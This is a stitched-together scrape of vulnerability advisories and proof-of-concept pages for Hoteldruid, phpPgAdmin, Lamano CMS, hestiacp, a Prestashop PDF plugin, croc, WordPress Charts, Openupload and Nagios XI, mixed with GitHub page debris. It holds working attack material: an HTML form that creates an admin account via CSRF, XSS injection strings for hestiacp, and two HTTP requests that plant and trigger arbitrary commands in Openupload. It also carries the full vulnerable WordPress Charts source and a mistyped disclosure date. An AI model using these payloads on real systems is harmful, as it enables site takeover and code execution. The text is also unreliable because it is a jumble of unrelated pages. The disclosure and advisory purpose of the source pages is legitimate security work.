A cross-site scripting (XSS) vulnerability in /hoteldruid/clienti.php of Hoteldruid v3.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the nometipotariffa1 parameter.

CVE-2023-43376

Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the numcaselle parameter at /hoteldruid/creaprezzi.php.

CVE-2023-43371

phpPgAdmin 7.14.4 and earlier is vulnerable to deserialization of untrusted data which may lead to remote code execution because user-controlled data is directly passed to the PHP 'unserialize()' function in multiple places. An example is the functionality to manage tables in 'tables.php' where the 'ma[]' POST parameter is deserialized.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-40619: vulnerability-research/CVE-2023-40619 at main · dub-flow/vulnerability-research

Lamano CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Lamano CMS v2.0 CSRF Vulnerability                                                                                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : http://www.lamano.lu/                                                                                              |    
| # Dork      :  © 2018 Lamano by easysolutions                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 8.

[+] Set the target site link Save changes and apply . 

[+] infected file : admin.php

[+] http://127.0.0.1/q73/admin.php .

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">

</tr>  
                    </table>  
                <br/><br/>  
        <form action="https://www.sylviebecker.127.0.0.1/lu/admin.php?action=add_user" method="POST">  
            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">  
                <tr>  
                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>  
                </tr>  
                <tr>  
                    <td class="tah11" align="right">Nom d'utilisateur :</td>  
                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>  
                </tr>  
                <tr>  
                    <td class="tah11" align="right">Mot de passe : </td>  
                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>  
                </tr>  
                <tr>  
                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>  
                </tr>  
            </table>  
        </form><br/><br/>  
<div>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Lamano CMS 2.0 Cross Site Request Forgery

Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.8.8.



**Description**

Multiple Self-XSS Vulnerabilities are triggered at multiple endpoints.

**http://localhost:8083/edit/server/**

There is a bug in web/templates/pages/edit_server.php file. Attacker can control $v_timezone.

    <form
            x-data="{
                timezone: '<?= $v_timezone ?? "" ?>',
                theme: '<?= $_SESSION["THEME"] ?>',
                language: '<?= $_SESSION["LANGUAGE"] ?>',
                hasSmtpRelay: <?= $v_smtp_relay == "true" ? "true" : "false" ?>,
                remoteBackupEnabled: <?= !empty($v_backup_remote_adv) ? "true" : "false" ?>,
                backupType: '<?= !empty($v_backup_type) ? trim($v_backup_type, "'") : "" ?>',
                webmailAlias: '<?= $_SESSION["WEBMAIL_ALIAS"] ?? "" ?>',
                apiSystem: '<?= $_SESSION["API_SYSTEM"] ?>',
                legacyApi: '<?= $_SESSION["API"] ?>',
                showSystemOptions: false,
                showProtectionOptions: false,
                showPolicyOptions: false,
            }"
            id="main-form"
            name="v_configure_server"
            method="post"
        >
    
    

**Proof of Concept**

    1. Intercept request with Burpsuite 
    2. Replace $v_timezone with '}"><img+src%3d""+onerror%3d"alert(1)"><for+x-data%3d"{timezone%3a'
    

https://drive.google.com/file/d/1VcvdGdSXVDcAoDd1YbW5pWd8IqVKVuiE/view?usp=sharing

**http://localhost:8083/add/package/**

There is a bug in web/templates/pages/add_package.php file. Attacker can control $v_backend_template.

        <?php
                                    foreach ($backend_templates as $key => $value) {
                                    echo $v_backend_template;
                                        echo "\t\t\t\t<option value=\"".$value."\"";
                                        if ((!empty($v_backend_template)) && ( $value == trim($v_backend_template, "'"))){
                                            echo ' selected' ;
                                        }
                                        echo ">".htmlentities($value)."</option>\n";
                                    }
    ?>
    

**Proof of Concept**

    1. Intercept request with Burpsuite 
    2. Replace $v_backend_template with '</select><img+src%3d""+onerror%3d"alert(1)">
    

https://drive.google.com/file/d/1nALSSZ3uUUa9fCC3Xhn1Zz0IJ-ZKYjjV/view?usp=sharing

**Impact**

The impact is low. Because the successful attack requires some conditions

**Occurrences**

CVE-2023-5084: Multiple Self-XSS Vulnerabilites in hestiacp

M4 PDF plugin for Prestashop sites, in its 3.2.3 version and before, is vulnerable to a directory traversal vulnerability. The “f” parameter is not properly checked in the resource /m4pdf/pdf.php, returning any file given its relative path. An attacker that exploits this vulnerability could download /etc/passwd from the server if the file exists.

Affected Resources

*   M4 PDF plugin for Prestashop sites, 3.2.3 version and before.

Description

INCIBE has coordinated the publication of 2 vulnerabilities in M4 PDF plugin for Prestashop sites, which has been discovered by Francisco Díaz-Pache Alonso, David Álvarez Robles and Sergio Corral Cristo, members of Alisec Soluciones S.L Offensive Security Team.

These vulnerabilities have been assigned the following codes:

*   **CVE-2022-45447.** A CVSS v3.1 base score of 6,5 has been calculated: the CVSS vector string is AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N. The vulnerability type is **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').
*   **CVE-2022-45448.** A CVSS v3.1 base score of 3,5 has been calculated: the CVSS vector string is AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N. The vulnerability type is **CWE-79**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').

Solution

There is still no solution for the reported vulnerabilities.

Detail

*   **CVE-2022-45447**: M4 PDF plugin for Prestashop sites, in its 3.2.3 version and before, is vulnerable to a directory traversal vulnerability. The “f” parameter is not properly checked in the resource /m4pdf/pdf.php, returning any file given its relative path. An attacker that exploits this vulnerability could download /etc/passwd from the server if the file exists.
*   **CVE-2022-45448**: M4 PDF plugin for Prestashop sites, in its 3.2.3 version and before, is vulnerable to an arbitrary HTML Document crafting vulnerability. The resource /m4pdf/pdf.php uses templates to dynamically create documents. In the case that the template does not exist, the application will return a fixed document with a message in mpdf format. An attacker could exploit this vulnerability by inputting a valid HTML/CSS document as the value of the parameter.

If you have any information regarding this advisory, please contact INCIBE as indicated in the CVE assignment and publication.

CVE-2022-45447: Multiple Vulnerabilities M4 Pdf Plugin Prestashop Sites | INCIBE-CERT

An issue was discovered in Croc through 9.6.5. The shared secret, located on a command line, can be read by local users who list all processes and their arguments.

CVE-2023-43621: security - croc: multiple issues in file sharing utility

The WordPress Charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wp_charts' shortcode in versions up to, and including, 0.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

1<?php2/\*3Plugin Name: WordPress Charts4Plugin URI: http://wordpress.org/plugins/wp-charts/5Description: Create amazing HTML5 charts easily in WordPress. A flexible and lightweight WordPress chart plugin including 6 customizable chart types (line, bar, pie, radar, polar area and doughnut types) as well as a fallback to provide support for older IE.  Incorporates the fantastic chart.js script : http://www.chartjs.org/6Version: 0.7.07Author: OzTheGreat (WPArtisan)8Author URI: https://wpartisan.me9\*/1011/\*\*12 \* Copyright (c) 2019- WPArtisan. All rights reserved.13 \* Copyright (c) 2013-2018 WebFactory Ltd. All rights reserved.14 \* Copyright (c) 2013 WebFactory Ltd. All rights reserved.15 \*16 \* Released under the GPLv2 license17 \* http://www.gnu.org/licenses/gpl-2.0.html18 \*19 \* This is an add-on for WordPress20 \* http://wordpress.org/21 \*22 \*23 \* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*24 \* This program is free software; you can redistribute it and/or modify25 \* it under the terms of the GNU General Public License as published by26 \* the Free Software Foundation; either version 2 of the License, or27 \* (at your option) any later version.28 \*29 \* This program is distributed in the hope that it will be useful,30 \* but WITHOUT ANY WARRANTY; without even the implied warranty of31 \* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the32 \* GNU General Public License for more details.33 \* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*34 \*35 \*36 \*/3738define( 'WP\_CHARTS\_URL',  trailingslashit( plugins\_url('', \_\_FILE\_\_) ));39define( 'WP\_CHARTS\_PATH', trailingslashit( plugin\_dir\_path( \_\_FILE\_\_) ) );40define( 'WP\_CHARTS\_BASENAME', plugin\_basename( \_\_FILE\_\_) );4142include WP\_CHARTS\_PATH.'inc/charts-widget.php';43if ( is\_admin() ) {44    include WP\_CHARTS\_PATH.'inc/admin/admin.php';45}46474849/\*\*50 \* Add IE Fallback for HTML5 and canvas51 \* @since Unknown52 \*/53function wp\_charts\_html5\_support () {54    echo '';57    echo '      <style>58                        /\*wp\_charts\_js responsive canvas CSS override\*/59                        .wp\_charts\_canvas {60                                width:100%!important;61                                max-width:100%;62                        }6364                        @media screen and (max-width:480px) {65                                div.wp-chart-wrap {66                                        width:100%!important;67                                        float: none!important;68                                                margin-left: auto!important;69                                                margin-right: auto!important;70                                                text-align: center;71                                }72                        }73                </style>';74}7576/\*\*77 \* Register Script78 \*79 \* @since Unknown80 \*/81function wp\_charts\_load\_scripts( $force \=  false ) {8283        if ( ! is\_admin() || $force ) {84                // WP Scripts85                wp\_enqueue\_script( 'jquery' );8687                // Register plugin Scripts88                wp\_register\_script( 'charts-js', WP\_CHARTS\_URL.'js/Chart.min.js' );89                wp\_register\_script( 'wp-chart-functions', WP\_CHARTS\_URL.'/js/functions.js', array( 'jquery' ) ,'', true );9091                // Enqueue those suckers92                wp\_enqueue\_script( 'charts-js' );93                wp\_enqueue\_script( 'wp-chart-functions' );94        }9596}9798if ( !function\_exists('wp\_charts\_compare\_fill') ) {99    /\*\*100     \* Make sure there are the right number of colors in the colour array101     \* @since Unknown102     \*103     \* @param $measure104     \* @param $fill105     \*/106        function wp\_charts\_compare\_fill(&$measure,&$fill) {107                // only if the two arrays don't hold the same number of elements108                if (count($measure) != count($fill)) {109                    // handle if $fill is less than $measure110                    while (count($fill) < count($measure) ) {111                        $fill \= array\_merge( $fill, array\_values($fill) );112                    }113                    // handle if $fill has more than $measure114                    $fill \= array\_slice($fill, 0, count($measure));115                }116        }117}118119120if (!function\_exists( "wp\_charts\_hex2rgb" )) {121    /\*\*122     \* Color conversion function123     \*124     \* @since Unknown125     \* @param $hex126     \* @return string127     \*/128        function wp\_charts\_hex2rgb($hex) {129           $hex \= str\_replace("#", "", $hex);130131           if(strlen($hex) \== 3) {132              $r \= hexdec(substr($hex,0,1).substr($hex,0,1));133              $g \= hexdec(substr($hex,1,1).substr($hex,1,1));134              $b \= hexdec(substr($hex,2,1).substr($hex,2,1));135           } else {136              $r \= hexdec(substr($hex,0,2));137              $g \= hexdec(substr($hex,2,2));138              $b \= hexdec(substr($hex,4,2));139           }140141           $rgb \= array($r, $g, $b);142           return implode(",", $rgb); // returns the rgb values separated by commas143        }144}145146147if (!function\_exists('wp\_charts\_trailing\_comma')) {148    /\*\*149     \* wp\_charts\_trailing\_comma150     \*151     \* @param $incrementor152     \* @param $count153     \* @param $subject154     \* @return string155     \*/156        function wp\_charts\_trailing\_comma($incrementor, $count, &$subject) {157                $stopper \= $count \- 1;158                if ($incrementor !== $stopper) {159                        return $subject .= ',';160                }161        }162}163164/\*\*165 \* Chart Shortcode 1 - Core Shortcode with all options166 \*167 \* @param $atts168 \* @return string169 \*/170function wp\_charts\_shortcode( $atts ) {171172    // Default Attributes173    // - - - - - - - - - - - - - - - - - - - - - - -174    extract( shortcode\_atts(175            array(176                'type'             \=> 'pie',177                'title'            \=> 'chart',178                'canvaswidth'      \=> '625',179                'canvasheight'     \=> '625',180                'width'                    \=> '48%',181                'height'                   \=> 'auto',182                'margin'                   \=> '5px',183                'relativewidth'    \=> '1',184                'align'            \=> '',185                'class'                    \=> '',186                'labels'           \=> '',187                'data'             \=> '30,50,100',188                'datasets'         \=> '30,50,100 next 20,90,75',189                'colors'           \=> '#69D2E7,#E0E4CC,#F38630,#96CE7F,#CEBC17,#CE4264',190                'fillopacity'      \=> '0.7',191                'pointstrokecolor' \=> '#FFFFFF',192                'animation'                \=> 'true',193                'scalefontsize'    \=> '12',194                'scalefontcolor'   \=> '#666',195                'scaleoverride'    \=> 'false',196                'scalesteps'       \=> 'null',197                'scalestepwidth'   \=> 'null',198                'scalestartvalue'  \=> 'null'199            ), $atts )200    );201202    // prepare data203    // - - - - - - - - - - - - - - - - - - - - - - -204    $title    \= str\_replace(' ', '', $title);205    $data     \= explode(',', str\_replace(' ', '', $data));206    $datasets \= explode("next", str\_replace(' ', '', $datasets));207208    if ( ! $title || ( empty( $data ) && empty( $datasets ) ) ) {209        return '';210    }211212    // check that the colors are not an empty string213    if ($colors != "") {214        $colors   \= explode(',', str\_replace(' ','',$colors));215    } else {216        $colors \= array('#69D2E7','#E0E4CC','#F38630','#96CE7F','#CEBC17','#CE4264');217    }218219    (strpos($type, 'lar') !== false ) ? $type \= 'PolarArea' : $type \= ucwords($type);220221    // output - covers Pie, Doughnut, and PolarArea222    // - - - - - - - - - - - - - - - - - - - - - - -223    $currentchart \= '<div class="'.$align.' '.$class.' wp-chart-wrap" style="max-width: 100%; width:'.$width.'; height:'.$height.';margin:'.$margin.';" data-proportion="'.$relativewidth.'">';224    $currentchart .= '<canvas id="'.$title.'" height="'.$canvasheight.'" width="'.$canvaswidth.'" class="wp\_charts\_canvas" data-proportion="'.$relativewidth.'"></canvas></div>225        <script type="text/javascript">';226227    // output Options228    $currentchart .= 'var '.$title.'Ops = {229                animation: '.$animation.',';230231    if ($type \== 'Line' || $type \== 'Radar' || $type \== 'Bar' || $type \== 'PolarArea') {232        $currentchart .=        'scaleFontSize: '.$scalefontsize.',';233        $currentchart .=        'scaleFontColor: "'.$scalefontcolor.'",';234        $currentchart .=    'scaleOverride:'   .$scaleoverride.',';235        $currentchart .=    'scaleSteps:'          .$scalesteps.',';236        $currentchart .=    'scaleStepWidth:'  .$scalestepwidth.',';237        $currentchart .=    'scaleStartValue:' .$scalestartvalue;238    }239240    // end options array241    $currentchart .= '}; ';242243    // start the js arrays correctly depending on type244    if ($type \== 'Line' || $type \== 'Radar' || $type \== 'Bar' ) {245246        wp\_charts\_compare\_fill($datasets, $colors);247        $total    \= count($datasets);248249        // output labels250        $currentchart .= 'var '.$title.'Data = {';251        $currentchart .= 'labels : \[';252        $labelstrings \= explode(',',$labels);253        for ($j \= 0; $j < count($labelstrings); $j++ ) {254            $currentchart .= '"'.$labelstrings\[$j\].'"';255            wp\_charts\_trailing\_comma($j, count($labelstrings), $currentchart);256        }257        $currentchart .=        '\],';258        $currentchart .= 'datasets : \[';259    } else {260        wp\_charts\_compare\_fill($data, $colors);261        $total \= count($data);262        $currentchart .= 'var '.$title.'Data = \[';263    }264265    // create the javascript array of data and attr correctly depending on type266    for ($i \= 0; $i < $total; $i++) {267268        if ($type \=== 'Pie' || $type \=== 'Doughnut' || $type \=== 'PolarArea') {269            $currentchart .= '{270                                        value   : '. $data\[$i\] .',271                                        color   : '.'"'. $colors\[$i\].'"'.'272                                }';273274        } else if ($type \=== 'Bar') {275            $currentchart .= '{276                                        fillColor       : "rgba('. wp\_charts\_hex2rgb( $colors\[$i\] ) .','.$fillopacity.')",277                                        strokeColor : "rgba('. wp\_charts\_hex2rgb( $colors\[$i\] ) .',1)",278                                        data            : \['.$datasets\[$i\].'\]279                                }';280281        } else if ($type \=== 'Line' || $type \=== 'Radar') {282            $currentchart .= '{283                                        fillColor       : "rgba('. wp\_charts\_hex2rgb( $colors\[$i\] ) .','.$fillopacity.')",284                                        strokeColor : "rgba('. wp\_charts\_hex2rgb( $colors\[$i\] ) .',1)",285                                        pointColor      : "rgba('. wp\_charts\_hex2rgb( $colors\[$i\] ) .',1)",286                                        pointStrokeColor : "'.$pointstrokecolor.'",287                                        data            : \['.$datasets\[$i\].'\]288                                }';289290        }  // end type conditional291        wp\_charts\_trailing\_comma($i, $total, $currentchart);292    }293294    // end the js arrays correctly depending on type295    if ($type \== 'Line' || $type \== 'Radar' || $type \== 'Bar') {296        $currentchart .=        '\]};';297    } else {298        $currentchart .=        '\];';299    }300301    //var wpChart'.$title.$type.' = new Chart(document.getElementById("'.$title.'").getContext("2d")).'.$type.'('.$title.'Data,'.$title.'Ops);302303    $currentchart .= '304         window.wp\_charts = window.wp\_charts || {};305             window.wp\_charts\["'.$title.'"\] = { options: '.$title.'Ops, data: '.$title.'Data, type: "'.$type.'" };306307        </script>';308309    // return the final result310    // - - - - - - - - - - - - - - - - - - - - - - -311    return $currentchart;312}313314/\*\*315 \* wp\_charts\_kickoff316 \*317 \* @since Unknown318 \*/319function wp\_charts\_kickoff() {320        add\_action( "wp\_enqueue\_scripts", "wp\_charts\_load\_scripts" );321        add\_action('wp\_head', 'wp\_charts\_html5\_support');322        add\_shortcode( 'wp\_charts', 'wp\_charts\_shortcode' );323}324325add\_action('init', 'wp\_charts\_kickoff');

CVE-2023-5062: wordpress_charts_js.php in wp-charts/tags/0.7.0 – WordPress Plugin Repository

File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.

**CVE-2023-36319**

By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.

**Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.**

**Affected version:**

openupload Stable version 0.4.3

**Step one**

Log in to the backend and click on the function: Administration ->Plugins ->compress

Add new “command” directive and save:

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 183
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
    

**Step two**

Enter the "File upload" function, upload a random file, and ensure "compress=0" in the parameters.

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 53
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=u&step=3&description=123&emailme=no&compress=0
    

The commands we write will be executed normally.

CVE-2023-36319: GitHub - Lowalu/CVE-2023-36319: exp4CVE-2023-36319

A SQL injection vulnerability in Nagios XI 5.11.1 and below allows authenticated attackers with privileges to manage host escalations in the Core Configuration Manager to execute arbitrary SQL commands via the host escalation notification settings.

During some standard research as part of the Outpost24 Ghost Labs Vulnerability Research department, I discovered four different vulnerabilities in Nagios XI (version 5.11.1 and lower). Three of these vulnerabilities (CVE-2023-40931, CVE-2023-40933 and CVE-2023-40934) allow users, with various levels of privileges, to access database fields via SQL Injections. The data obtained from these vulnerabilities may be used to further escalate privileges in the product and obtain sensitive user data such as password hashes and API tokens.

The fourth vulnerability (CVE-2023-40932) allows Cross-Site Scripting via the Custom Logo component, which will render on every page, including the login page. This may be used to read and modify page data, such as plain-text passwords from login forms.

All these vulnerabilities have been resolved as of 2023.09.11 and users are advised to upgrade to 5.11.2 or later.

**What is Nagios XI**

Nagios XI is a popular and widely used commercial monitoring solution for IT infrastructure and network monitoring. It is the commercial version of the open-source Nagios Core monitoring platform, and provides added features to simplify the process of managing complex IT environments.

Due to the access required by Nagios XI, it is often deployed in high-privileged environments, which makes it an interesting asset for an attacker to target.

**The four vulnerabilities**

Nagios XI features “Announcement Banners”, which can optionally be acknowledged by users. The endpoint for this feature is vulnerable to a SQL Injection attack.

When a user acknowledges a banner, a POST request is sent to \`/nagiosxi/admin/banner\_message-ajaxhelper.php\` with the POST data consisting of the intended action and message ID – \`action=acknowledge banner message&id=3\`.

The ID parameter is assumed to be trusted but comes directly from the client without sanitization. This leads to a SQL Injection where an authenticated user with low or no privileges can retrieve sensitive data, such as from the \`xi\_session\` and \`xi\_users\` table containing data such as emails, usernames, hashed passwords, API tokens, and backend tickets.

This vulnerability does not require the existence of a valid announcement banner ID, meaning it can be exploited by an attacker at any time.

**2\. SQL Injection in Host/Service Escalation in CCM (CVE-2023-40934)**

The Core Configuration Manager in Nagios XI allows an authenticated user with privilege to manage host escalations to perform arbitrary database queries through the \`/nagiosxi/includes/components/ccm/index.php\` endpoint.

The parameters \`tfFirstNotif\`, \`tfLastNotif\`, and \`tfNotifInterval\` are assumed to be trusted despite coming directly from the client through a POST request.

This vulnerability results in the same access to the database as the other SQL Injection vulnerabilities, but requires additional privileges compared to CVE-2023-40931.

**3\. SQL Injection in Announcement Banner Settings (CVE-2023-40933)**

Nagios XI has an administrative page for Announcement Banner settings, which contains a SQL Injection vulnerability in the \`/nagiosxi/admin/banner message-ajaxhelper.php\` endpoint.

When performing the \`update\_banner\_message\_settings\` action on the affected endpoint, the \`id\` parameter is assumed to be trusted and is concatenated into a database query with no sanitization. This allows an attacker to modify the query.

Successful exploitation grants the same database access as the other two SQL Injection Vulnerabilities, but requires additional privileges compared to CVE-2023-40931.

**4\. Cross-Site Scripting in Custom Logo Component (CVE-2023-40932)**

Nagios XI can be customized with a custom company logo, which will be displayed across the entire product. This includes the landing page, various administrative pages, and the login page.

Due to a cross-site scripting vulnerability in this feature, an attacker can inject arbitrary JavaScript which will evaluate in any users’ browser. This can be used to read and modify page data, as well as perform actions on behalf on the affected user. Furthermore, as this renders on the login page, plain-text credentials can be stolen from users’ browsers as they enter them.

**Disclosure timeline**

We found and disclosed the vulnerabilities to Nagios in August 2023. Here’s what happened next:

*   2023-08-04 – Contacted vendor and submitted report
*   2023-08-04 – Vendor acknowledged report, started reviewing
*   2023-08-11 – Vendor confirmed all 4 vulnerabilities
*   2023-08-11 – Contacted MITRE for CVE allocation
*   2023-09-01 – CVEs reserved by MITRE
*   2923-09-07 – Coordinated disclosure for 2023-09-19
*   2023-09-11 – Nagios XI 5.11.2 released with security fixes applied
*   2023-09-19 – Vulnerabilities fully disclosed

**The importance of application security testing**

In a targeted attack, these types of vulnerabilities are relatively easy to exploit. As recent attacks have demonstrated (most notably the SolarWinds hack), IT management platforms are also likely targets. Without continuous application security testing in place, critical business data is at risk. Outpost24 provides security solutions and pen testing services with direct access to our security experts for remediation guidance and validation. Test your applications in real-time for the latest vulnerabilities with Outpost24.

**About Ghost Labs**

Ghost Labs is the specialist security unit within Outpost24 working in partnership with our clients to meet their penetration testing needs and objectives. Our experienced Offensive Security team offers enhanced and bespoke penetration testing security services such as advanced network penetration testing, (web)application testing, Red Teaming assessments and complex web application exploitation to help organizations have a true picture of their cyber risk. In addition, the Ghost Labs team is an active contributor to the security community with vulnerability research and coordinated responsible disclosure program.

Ghost Labs performs hundreds of successful penetration tests for its customers ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers, covering a wide range of advanced testing services to help companies keep up with evolving threats and new technologies. To help businesses drive security maturity and mitigate risks posed by the evolving threat and techniques of the modern-day hacker.

Tag

#php